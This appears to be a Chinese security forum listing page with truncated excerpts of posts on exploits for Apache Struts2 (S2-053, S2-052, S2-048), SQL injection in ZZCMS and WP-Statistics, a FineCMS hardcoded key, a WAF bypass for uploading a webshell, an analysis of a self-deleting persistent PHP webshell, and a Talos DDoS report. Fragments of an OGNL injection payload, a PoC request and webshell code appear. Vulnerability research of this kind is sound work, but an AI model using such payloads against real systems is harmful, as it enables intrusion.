Apache Struts2(S2-053) 漏洞利用工具

需要net4.0EXP%{(#_='multipart/form-data').(#[email protected]@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@co

s2-052poc和批量验证

这个是单站的:POST /struts2-rest-showcase/orders/3;jsessionid=A82EAA2857A1FFAF61FF24A1FBB4A3C7 HTTP/1.1Host: 127.0.0.1:8080User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.12; rv:54.0) Gecko/2

ZZCMS v8.1 sql注入

看了pands发了个这个CMS的漏洞下下来看了一下后台登录的地方D:\phpStudy\WWW\user\logincheck.php<?php $admin=nostr(trim($_POST["admin"])); $pass=trim($_POST["pass"]); $pass=md5($pass); $ip=getip(); define('trytimes',5);//可尝试登录次数 define('jgsj

FineCMS SYS_KEY未初始化导致任意文件写入

起初我以为这个sys_key是随机生成的.然后我本地和vps上发现都是一样的.最后去看了下源码发现没有生成这个值的地方.最后的最后看了开源的地址http://git.oschina.net/dayrui/finecms/blob/master/v5/config/system.php


发现是固定值 24b16fede9a67c9251d3e7c7161c83ac


文件:finecms/dayrui/controllers/Api.php


ACCESS无select SQL注射

33.jpg

Talos揭露中国在线DDOS平台的崛起 | 歪果仁眼中的中国黑产一景

在过去的几个月里,Talos发现中国网站上提供在线DDoS攻击服务的中国网站数量呈上升趋势。许多网站的布局和设计几乎完全相同:提供了一个简单的界面,用户可以在其中选择目标主机、端口、攻击方法和攻击时间。此外,这些网站大部分是在近六个月内注册的。然而,网站由不同名称的群体注册和运作,而且这些人之间也经常相互攻击。Talos试图对这些平台对创建者进行研究,并分析这种情势为何会迅速普及。在这篇文章中,主要描述了中国的DDoS行业的概况以及正在发生的趋向于在线攻击平台的威胁景观,研究了最近创建的DDoS

waf bypass

工作原因对某站进行渗透,同样是工作原因我不能描述太细致,所以很怂的我只能靠语言文字来描述一下整个思路,再附上这次bypass的马遇到的防火墙是一个没怎么见过的种类,大致fuzz了一下,规则有:1. 检测内容,如果有<, >, _GET, _POST, _REQUEST, phpinfo()等函数直接ban掉2. 检测行为,如果对上传的页面以GET或POST方式传递数据,直接ban掉通过注入找到一个可用的用户以后(没管理),发现一个上传点。在试图上传php时发现,会对里面的内容进行检测

php不死马

在别人服务器上dump下了这个文件,分析了一下,是一个挺有意思的不死马,分析以后跟大家分享一下所以这算原创还是转载…毕竟不是我写的马 有啥不合适的我再改(这个不死马的主体是这个文件,不妨叫Trojan.php<?php @unlink($_SERVER['SCRIPT_FILENAME']); //删除自身 error_reporting(0); //禁用错误报告 ignore_user_abort(true); //忽略与用户的断开,用户浏览

struts2 S2-048远程代码执行漏洞exp

此次暴发的Struts2 s2-048的漏洞,影响不是太大,网上也已经有小伙伴分享了exp,我这里补充一个自己改的。喜欢的小伙伴拿去玩吧。struts2 s2-048 exp代码:#!/usr/bin/env python # -*- coding: utf-8 -*- # Date: 2017/7/10 

WordPress统计插件Statistics SQL注入漏洞分析

今天下午的时候,看到了这个漏洞,然后复现并分析了一下。可能是理解有误,有原文有一些出入,如果有错误请不吝指出。

一、漏洞条件:

  • 插件版本<12.0.8

  • 至少需要一个订阅者账号,我测试的时候发现当前账号需要编辑或者提交文章的权限的,如果这里有错误,请指出~

二、漏洞成因:

WP-Statistics插件允许用户在页面添加shortcode(简码)用于丰富页面统计功能。